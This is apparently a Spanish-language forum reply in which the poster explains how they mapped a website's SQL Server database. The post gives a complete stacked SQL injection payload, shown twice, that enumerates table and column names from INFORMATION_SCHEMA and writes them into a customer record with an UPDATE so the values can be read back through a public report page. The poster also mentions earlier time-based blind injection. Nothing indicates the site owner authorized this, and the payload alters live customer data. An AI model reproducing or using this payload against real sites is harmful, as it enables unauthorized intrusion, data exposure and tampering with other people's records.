Gracias por sus respuestas (:ironic). He resuelto el problema de otra forma. Usé el blind sql injection time based para conseguir unas cuantas tablas de la base de datos y luego he buscado un reporte en la página web donde mostraban el nombre del cliente ingresando su código. Con eso, he usado el código del cliente para modificar su nombre y ponerle el resultado de la consulta que quiero. Así he podido mapear su base de datos (tablas, procedimientos almacenados). La consulta que he usado es la siguiente (están cambiadas las tablas, los códigos y el nombre):
'; declare @r varchar(8000) SELECT @r = TABLE_NAME FROM
( SELECT TABLE_NAME, ROW_NUMBER() OVER (ORDER BY TABLE_NAME asc) as row
FROM INFORMATION_SCHEMA.TABLES ) as alias
WHERE row = 1
declare @c varchar(8000) SELECT @c = concat(COLUMN_NAME, ' ',
ORDINAL_POSITION) FROM
(SELECT COLUMN_NAME, ORDINAL_POSITION, ROW_NUMBER() OVER (ORDER BY COLUMN_NAME asc) as row
FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = @r ) as alias
WHERE row = 1 UPDATE DataBase.tbCliente
SET cliente = concat(@c, 'CLIENTE1')
WHERE codigo = '01'; --
'; declare @r varchar(8000) SELECT @r = TABLE_NAME FROM
( SELECT TABLE_NAME, ROW_NUMBER() OVER (ORDER BY TABLE_NAME asc) as row
FROM INFORMATION_SCHEMA.TABLES ) as alias
WHERE row = 1
declare @c varchar(8000) SELECT @c = concat(COLUMN_NAME, ' ',
ORDINAL_POSITION) FROM
(SELECT COLUMN_NAME, ORDINAL_POSITION, ROW_NUMBER() OVER (ORDER BY COLUMN_NAME asc) as row
FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME = @r ) as alias
WHERE row = 1 UPDATE DataBase.tbCliente
SET cliente = concat(@c, 'CLIENTE1')
WHERE codigo = '01'; --